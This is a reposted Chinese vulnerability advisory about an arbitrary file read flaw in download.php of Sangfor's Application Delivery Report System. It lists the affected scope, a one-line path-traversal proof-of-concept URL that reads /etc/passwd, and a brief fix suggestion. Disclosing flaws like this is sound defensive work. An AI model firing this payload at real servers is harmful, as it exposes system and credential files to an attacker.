首页 > 资讯 > 后端开发 > PHP编程 >深信服应用交付报表系统 download.php 任意文件读取漏洞

493

分享到

深信服应用交付报表系统 download.php 任意文件读取漏洞

php 安全 web安全 2023-09-02 17:09:16 493人浏览独家记忆

摘要

漏洞描述：深信服应用交付报表系统 download.PHP文件存在任意文件读取漏洞，攻击者通过漏洞可以下载服务器任意文件。漏洞利用条件: download.php文件接口漏洞影响范围：应用交付报表系统漏洞复现： 1、登录页面：

漏洞描述：

深信服应用交付报表系统 download.PHP文件存在任意文件读取漏洞，攻击者通过漏洞可以下载服务器任意文件。

漏洞利用条件:

download.php文件接口

漏洞影响范围：

应用交付报表系统

漏洞复现：

1、登录页面：

2.poc：/report/download.php?pdf=../../../../../etc/passwd

修复建议：

对下载进行严格控制

来源地址：https://blog.csdn.net/weixin_46801402/article/details/127684173

您可能感兴趣的文档:

--结束END--

本文标题: 深信服应用交付报表系统 download.php 任意文件读取漏洞

本文链接: https://lsjlt.com/news/391184.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

php变量作用域是什么

2024-02-29

PHP isset按钮不起作用怎么解决

2024-02-29

php中target标签怎么使用

2024-02-29

php怎么获取网页内容

2024-02-29

php怎么实现批量发送邮件

2024-02-29

PHP方法参数传递及返回值详解

2024-02-29

PHP7下载PDF文件失败的解决方法

2024-02-29

最佳在线PHP编辑器：快速创建文件

2024-02-29

解决PHP数据库中爱好无法显示的问题

2024-02-29

PHP验证码复制粘贴问题解决方法分享

2024-02-29

热门问答

回答

如何调试操作系统的错误？
操作系统

2023-11-15发布

回答

操作系统中的I/O系统是如何实现的？
操作系统

2023-11-15发布

回答

如何实现操作系统的内存管理？
操作系统

2023-11-15发布

回答

什么是虚拟内存，它对操作系统有什么影响？
操作系统

2023-11-15发布

回答

ASP中的MVC架构和WebForms架构有什么区别和使用场景？
ASP.NET

2023-11-15发布

回答

ASP中的数据验证和数据校验有什么不同？
ASP.NET

2023-11-15发布

回答

ASP中的ADO对象和DAO对象有什么区别和使用方法？
ASP.NET

2023-11-15发布

回答

Node.js中的包管理器NPM是什么？如何使用它进行依赖管理？
node.js

2023-11-15发布

回答

Vue.js中的动态组件是什么？如何使用它来动态渲染组件？
VUE

2023-11-15发布

回答

如何使用Vue.js实现懒加载和预加载？
VUE

2023-11-15发布

深信服 应用交付报表系统 download.php 任意文件读取漏洞

深信服应用交付报表系统 download.php 任意文件读取漏洞